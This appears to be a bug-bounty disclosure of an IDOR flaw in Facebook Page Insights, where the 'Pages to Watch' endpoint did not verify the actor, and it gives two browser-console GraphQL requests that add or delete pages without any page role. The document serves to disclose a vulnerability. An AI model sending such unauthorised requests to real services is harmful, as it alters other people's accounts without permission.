Published On: 24 Apr 2020
Anyone can add or remove items from the "Pages to Watch" section on a page's Insights tab
IDOR
Facebook | Web
---
MEDIUM VALIDIn Facebook pages insights settings, There is a feature called "Pages to watch". This feature compares the performance of your Page and posts with similar Pages on Facebook.
Description
Only Admins should have the permissions to add or remove pages to the list, But the vulnerable endpoint was not checking the actor of the action
Impact
It was possible to add or remove pages from the "Pages to Watch" without having any role on the page.
Reproduction Steps
Step
1
By calling this on console one was able to add pages to the list :
new AsyncRequest('/api/graphql?variables={"input":{"client_mutation_id":"1","actor_id":"<actor_id>","page_id":"<PAGEONE_ID>","competitor_id":"<PAGETWO_ID>","action":"add"}}&doc_id=2182889891748094').send()
Step
2
By calling this on console one was able to DELETE pages to the list :
new AsyncRequest('/api/graphql?variables={"input":{"client_mutation_id":"1","actor_id":"<actor_id>","page_id":"<PAGEONE_ID>","competitor_id":"<PAGETWO_ID>","action":"delete"}}&doc_id=2182889891748094').send()